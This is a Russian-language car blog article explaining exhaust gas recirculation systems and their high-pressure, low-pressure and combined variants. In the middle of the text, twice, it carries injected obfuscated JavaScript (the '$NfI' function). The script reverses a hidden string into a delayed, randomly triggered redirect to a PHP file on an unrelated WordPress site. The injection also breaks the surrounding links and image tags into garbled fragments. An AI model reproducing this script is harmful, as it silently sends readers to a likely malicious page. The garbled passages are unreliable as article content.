Двигатель

Система рециркуляции отработавших газов: зачем чистить выхлоп?

Проблема вредных выбросов машин волнует экологов уже не один десяток лет, из-за чего с завидной периодичностью выпускаются новые нормы, вынуждающие автопроизводителей внедрять различные инженерные ухищрения, делающие выхлоп чище. Одной из таких уловок является система рециркуляции отработавших газов. Что это такое и как она работает, узнаем в этой статье.

Система рециркуляции отработавших газов. Суть проблемы

Система, которую мы сегодня рассматриваем, создана инженерами для борьбы с оксидами азота, присутствующими в отработавших газах. Эти вредные соединения образовываются в момент воспламенения топливно-воздушной смеси и чем больше температура в камерах сгорания, тем их получается больше.

Чтобы разобраться с ними, конструкторы придумали довольно оригинальное решение – возвращать определённую часть выхлопных газов во впускной коллектор двигателя.

Такая процедура позволяет уменьшить температуру в цилиндрах и, как следствие, понизить количество образовывающихся оксидов азота.

Нужно отметить, друзья, что система рециркуляции отработавших газов используется и на дизельных моторах, и на бензиновых, преимущественно на «атмосферниках». Чаще всего, конечно на дизельных, так как температура сгорания смеси очень высока именно у дизелей. Их вариации и рассмотрим далее.

Что придумали инженеры?

В зависимости от поколения экологических норм, менялась и реализация системы рециркуляции газов. На данный момент автопроизводители придумали такие варианты:

Autoteka
  • высокого давления (содержание оксидов в выхлопе 0,25 г/км);
  • низкого давления (0,18 г/км);
  • комбинированная (0,08 г/км).

Cистема рециркуляции отработавших газов высокого давления$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/wp-content/uploads/2017/04/system-exhaust-gas-1.jpg»>Система рециркуляции отработавших газов низкого давления$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/benzinovyj-ili-dizelnyj-dvigatel.html» target=»_blank» rel=»noopener noreferrer»>автомобили с дизельным двигателем, отвечающим нормам Евро-5. Её особенность в том, что отбор продуктов горения топлива выполняется уже после to-eto.html» target=»_blank» rel=»noopener noreferrer»>сажевого фильтра.

Это позволяет подать во впускной коллектор более холодные газы, которые, к тому же, не будут содержать лишних твёрдых частиц.

В состав системы входят различные патрубки, а также заслонки и клапаны, регулирующие интенсивность рециркуляции. Управляет всем этим, конечно же, электроника мотора.

Комбинированная система рециркуляции отработавших газов

Тэги

Статьи по теме

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button